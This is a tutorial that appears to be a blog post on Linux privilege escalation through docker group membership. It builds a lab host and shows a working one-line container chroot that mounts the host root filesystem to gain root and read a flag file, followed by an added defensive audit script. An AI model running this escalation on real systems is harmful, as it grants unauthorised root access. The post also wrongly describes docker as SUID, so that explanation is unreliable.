Today we are going to learn how to Elevate our Privileges in a Linux system using Docker.
What is Docker?
Docker is a set of platform as a service products that uses OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels.
How does Docker lead to privesc?
When an admin adds an unprivileged user to the 'docker' group, that user can use the docker CLI to create containers. Because docker runs with the SUID bit set, we can use this to abuse the file system and elevate our privileges on our target.
Before we continue
In order to continue we need to create a vulnerable host machine.
DO NOT DO THIS ON A MACHINE YOU DON’T HAVE PERMISSIONS TO COMPROMISE
To create a vulnerable host I created a Droplet on DigitalOcean.
Create a new Droplet with 2GB Ram using Debian
SSH to our new droplet
Install docker-ce using this guide
Now we need to add an unprivileged user
root@target:~# adduser affix
Adding user `affix' ...
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Adding new group `useless' (1002) ...
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Adding new user `affix' (1002) with group `affix' ...
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Creating home directory `/home/affix' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for affix
Enter the new value, or press ENTER for the default
        Full Name :
        Room Number :
        Work Phone :
        Home Phone :
        Other :
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
Is the information correct? [Y/n]
Now add the new user to the docker group
usermod -aG docker affix
Now SSH to the target as the new user.
Checking our access
Before we go further, let's check that we have access to the docker group.
affix@target:~$ id
uid=1001(affix) gid=1001(affix) groups=1001(affix),999(docker)
Since we have access to the docker group, let's try running the hello-world container.
affix@target:~$ docker run hello-world

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    (amd64)
 3. The Docker daemon created a new container from that image which runs the
    executable that produces the output you are currently reading.
 4. The Docker daemon streamed that output to the Docker client, which sent it
    to your terminal.

To try something more ambitious, you can run an Ubuntu container with:
 $ docker run -it ubuntu bash

Share images, automate workflows, and more with a free Docker ID:
 https://hub.docker.com/

For more examples and ideas, visit:
 https://docs.docker.com/get-started/
Success! We can run containers, let's move on.
Docker can be used to read files on our target machine. This is useful for quickly grabbing file contents (for example, quick flag grabbing). This can be done by mounting the directory you want to read from and then reading the file.
So what exactly did this do?
By using the -v flag we specified a volume to mount; in this case the /root directory on the host was mounted to the /mnt directory in the container. Because docker has SUID we were able to mount a root-owned directory in our container!
Let's get full root system access
Just like reading files, we can mount the full file system of the host to gain access to the entire system, then chroot to gain full privileges on the host.
affix@target:~$ docker run -it -v /:/mnt alpine chroot /mnt
root@e63d48d18e03:/# ls /root/
flag.txt
root@e63d48d18e03:/# cat /root/flag.txt
2590d7e9e24c67f41b485f16e2796b3d0e3128379b81e6ca290d67e99376e794
root@e63d48d18e03:/# cat /etc/issue
Debian GNU/Linux 9 \n \l
As you can see we have full access to the system because we used chroot on the /mnt directory. This essentially allowed us to use the host operating system!
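For the defender's side of the walkthrough above, here is an added audit script (not from the original post) that finds every account placed in the docker group, the exact setup this post relies on, and reports the daemon socket's ownership and mode. The group file and socket path are parameters so it can run against a copied /etc/group or the constructed sample below; the sample file, its member names and the hypothetical DOCKER_AUDIT_DEMO switch are assumptions for the demo.

```shell
#!/bin/sh
# Audit helper: who can reach the Docker daemon via the 'docker' group?
# Membership in that group is equivalent to root on the host (see above).

# Print one docker-group member per line (defaults to the live /etc/group).
docker_group_members() {
    group_file="${1:-/etc/group}"
    # /etc/group format: name:password:gid:member1,member2,...
    awk -F: '$1 == "docker" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }' "$group_file"
}

# Succeed (exit 0) only if no account other than root is in the docker group.
docker_group_is_clean() {
    extra=$(docker_group_members "$1" | grep -vx root || true)
    [ -z "$extra" ]
}

# Report owner, group and mode of the daemon socket if present (GNU stat).
# A group-writable socket plus a populated docker group is the risky combination.
docker_socket_info() {
    sock="${1:-/var/run/docker.sock}"
    if [ -S "$sock" ]; then
        stat -c '%n %U:%G %a' "$sock"
    else
        printf '%s: no socket found\n' "$sock"
    fi
}

# Constructed sample /etc/group for a stand-alone run (not from a real host).
demo_group_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:
sudo:x:27:admin
docker:x:999:affix,deploy
EOF
    printf '%s\n' "$f"
}

# Demo (hypothetical switch): audit the constructed file instead of the host.
if [ "${DOCKER_AUDIT_DEMO:-1}" = 1 ]; then
    sample=$(demo_group_file)
    docker_group_members "$sample"
    docker_group_is_clean "$sample" || echo "WARNING: non-root members in docker group"
    docker_socket_info
    rm -f "$sample"
fi
```

Run it with DOCKER_AUDIT_DEMO=0 and call docker_group_members with no argument to audit the real /etc/group on a host you administer.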